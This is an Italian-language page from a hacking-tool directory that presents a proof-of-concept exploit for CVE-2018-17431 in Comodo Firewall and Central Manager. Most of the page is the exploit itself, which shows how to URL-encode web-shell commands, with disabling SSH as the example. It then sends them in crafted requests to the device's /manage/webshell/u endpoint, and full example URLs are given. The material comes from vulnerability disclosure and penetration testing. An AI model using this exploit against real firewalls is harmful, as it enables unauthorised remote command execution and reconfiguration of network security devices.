Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-17431-Comodo — Comodo | Kitploit
Strumenti/GitHubGitHub/sanan2004/cve-2018-17431-comodo
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubsanan2004/cve-2018-17431-comodo

CVE-2018-17431-Comodo

Comodo

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2018-17431-PoC

Prova di concetto per CVE-2018-17431

Exploit Title: Comodo Firewall & Central Manager (UTM) Tutte le versioni precedenti alla 2.7.0 e 1.5.0 Esecuzione di comandi remoti (basato su Web Shell)

Autore dell'exploit: Milad Fadavvi

Homepage del fornitore: https://www.comodo.com/

Link del software: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

Versione: prima della 2.7.0 e 1.5.0

Testato su: Windows:firefox/chrome - Kali:firefox

Data di scoperta: 2018-08-15 (segnalato lo stesso giorno)

Conferma che il bug esiste: 2018-09-22 (Ticket ID: XWR-503-79437)

Exploit:

  1. WebShell simulation:

    root@kitploit:~
     Ad esempio, disabilitare SSH nella web shell è così:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. Encode

    root@kitploit:~
     codificare la sequenza precedente con URL ENCODING
     (ho usato il plugin burp encoder)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. Run

    root@kitploit:~
     URL di base: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (invio extra per eseguire il comando)
               
    
     Esempio: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

Verrà visualizzata una pagina con il messaggio "Configuration has been altered" e la configurazione verrà modificata!

Con questa tecnica, possiamo simulare tutti i comandi WebShell.

Scarica lo strumento